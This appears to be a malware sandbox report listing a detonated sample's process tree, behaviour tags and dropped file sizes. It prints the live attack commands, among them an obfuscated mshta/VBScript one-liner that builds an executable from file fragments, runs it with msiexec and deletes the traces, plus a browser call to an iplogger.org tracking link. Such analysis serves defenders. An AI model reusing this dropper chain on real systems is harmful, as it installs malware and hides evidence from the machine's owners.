C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT: cloSE ( cREateObJEct ( "wsCRipt.SheLl" ). rUn ( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " , 0, TRue ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "6⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"6⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n6⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c6db969ab9.exeTue09c6db969ab9.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c6db969ab9.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c6db969ab9.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0947ef38552fc.exeTue0947ef38552fc.exe1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji73⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae0d46f8,0x7ffcae0d4708,0x7ffcae0d47184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:34⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,6841745165746709517,7376899043197376723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:84⤵
-
-
-
-
C:\Users\Public\run.exeC:\Users\Public\run.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 2803⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2842⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue097328c1b990.exeTue097328c1b990.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3416 -ip 34161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 492 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1052 -ip 10521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3296 -ip 32961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4908 -ip 49081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3496 -ip 34961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2016 -ip 20161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4752 -ip 47521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5680 -ip 56801⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\13bpu9cGZVQ3bQBYByHDZulD.exe"2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3084 -ip 30841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2016 -ip 20161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5668 -ip 56681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 5536 -ip 55361⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1640 -ip 16401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5392 -ip 53921⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
3.3MB
-
Filesize
164KB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
2.5MB
-
Filesize
272KB
-
Filesize
496KB
-
Filesize
856KB
-
Filesize
68KB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
568KB
-
Filesize
80KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
120KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
296KB
-
Filesize
164KB
-
Filesize
8KB
-
Filesize
128KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
724KB
-
Filesize
728KB
-
Filesize
856KB
-
Filesize
496KB
-
Filesize
192KB
-
Filesize
268KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
2.1MB